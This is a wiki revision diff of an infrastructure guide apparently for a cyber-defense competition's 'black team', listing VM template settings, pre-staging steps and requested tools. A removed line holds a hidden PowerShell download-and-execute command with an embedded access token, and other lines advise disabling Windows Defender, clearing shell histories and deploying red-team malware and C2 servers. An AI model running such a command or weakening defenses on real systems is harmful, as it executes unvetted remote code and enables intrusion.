guides:lockdown_black_team

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
Last revision Both sides next revision
guides:lockdown_black_team [2019/12/19 04:44]
aibekzhy Swappiness
guides:lockdown_black_team [2020/05/22 15:28]
aibekzhy [Post Deployment Checklist]
Line 18: Line 18:
     - Copy Paste Enabled     - Copy Paste Enabled
     - Graphics to support Full HD/​Automatic Graphics Detection     - Graphics to support Full HD/​Automatic Graphics Detection
 +    - Ensure time Synchronized
 +    - Potentially disable DHCP
 +    - Make sure the best NIC type is attached "​vmxnet3"​ -> "​vmxnet2"​ -> etc
  
   * Linux:   * Linux:
Line 24: Line 27:
     - SSH server (installed, enabled, running)     - SSH server (installed, enabled, running)
     - Decrease swappiness to 10     - Decrease swappiness to 10
-    - Ubuntu specific:+    ​- Python2 and python3 installed (less headache if you are using ansible) 
 +    ​- Ubuntu-specific:
       - Ensure networkd is a renderer       - Ensure networkd is a renderer
 +      - Install resolvconf to configure DNS on 18.*
     - Fedora specific:     - Fedora specific:
       - Depending on implementation look into installing network-scripts       - Depending on implementation look into installing network-scripts
       - Install libselinux-python       - Install libselinux-python
     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870
 +
 +
   * Windows:   * Windows:
     - VMWare tools     - VMWare tools
Line 37: Line 44:
     - Ensure that Windows Remote Management service is started Automatically     - Ensure that Windows Remote Management service is started Automatically
     - Enable Ping via Firewall (Allow ICMP Packets)     - Enable Ping via Firewall (Allow ICMP Packets)
-    - Disable Windows Defender (Registry/​GPO)+    - Disable/​Uninstall ​Windows Defender (Registry/​GPO)
     - Disable Windows Updates (Registry/​GPO/​Services)     - Disable Windows Updates (Registry/​GPO/​Services)
     - Ensure Sleep is disabled     - Ensure Sleep is disabled
-    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater+    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater ​(Might not worth it) 
 +    - Sometimes windows may start randomly shutting down. In which case please look into the following 
 +    - Use High-performance Battery Profile 
 +    - Windows 10 Enterprise specific: 
 +      - Make sure when Template is deployed, it has an Ethernet Access. If it doesn'​t have one, it will reboot endlessly: https://​superuser.com/​questions/​933754/​why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a  
  
   * Pfsense:   * Pfsense:
Line 51: Line 63:
   * Ensure you clean up the history of all applications/​shells   * Ensure you clean up the history of all applications/​shells
   * Ensure you take a snapshot of the entire infrastructure after deploying your malware   * Ensure you take a snapshot of the entire infrastructure after deploying your malware
 +  * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational,​ and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. ​
 +  * If the performance of VMs is very slow, try to lower the number of snapshots or use the snapshots that were created are no longer than a day before the competition.
  
  
Line 66: Line 80:
  
 Things that are typically requested: Things that are typically requested:
-  * Windows: Dotnet ​(powershell.exe -Sta -Nop -w hidden -Command "​IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/​temppp/​master/​builder.ps1?​token=AIVA5C62REQKCZAXPVLPOUS5TAWXC'​ -UseBasicParsing)"​)+  * Windows: ​ 
 +    * Dotnet https://dotnet.microsoft.com/download 
 +    * Python executables
   * C2 Servers   * C2 Servers
 +  * 
 ===== Naming Conventions ===== ===== Naming Conventions =====
  
  • guides/lockdown_black_team.txt
  • Last modified: 2020/06/08 05:49
  • by aibekzhy